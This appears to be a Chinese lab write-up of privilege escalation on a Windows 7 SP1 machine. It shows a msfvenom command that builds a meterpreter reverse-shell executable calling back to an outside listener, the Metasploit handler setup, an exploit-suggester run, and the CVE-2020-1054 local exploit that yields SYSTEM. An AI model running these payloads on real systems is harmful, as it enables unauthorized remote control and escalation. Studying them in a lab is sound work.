win7 sp1 提权实验

靶机信息
win7 sp1
64位

先关闭win7上的防火墙
利用msfvenom生成meterpreter反弹shell

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.182.128 lport=23333 -f exe X > shell.exe

将shell.exe丢到目标机器上

kali中启动msf

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.182
set lport 23333
run

win7 sp1 提权实验

win7中使用命令行执行shell.exe
win7 sp1 提权实验

可以看到kali中成功获取到meterpreter
win7 sp1 提权实验

getuid查看当前用户
win7 sp1 提权实验

background命令将meterpreter隐藏到后台,缩写为bg
win7 sp1 提权实验
可以看到session id为3

快速查询可利用漏洞

#指定模块
use post/multi/recon/local_exploit_suggester

#指定session
set session 3

#启动
run

win7 sp1 提权实验

提权

use exploit/windows/local/cve_2020_1054_drawiconex_lpe
set session 3
run

成功获取system权限
win7 sp1 提权实验

上一篇:使用kali对安卓手机进行渗透测试


下一篇:MSF(Metasploit)中的Meterpreter组件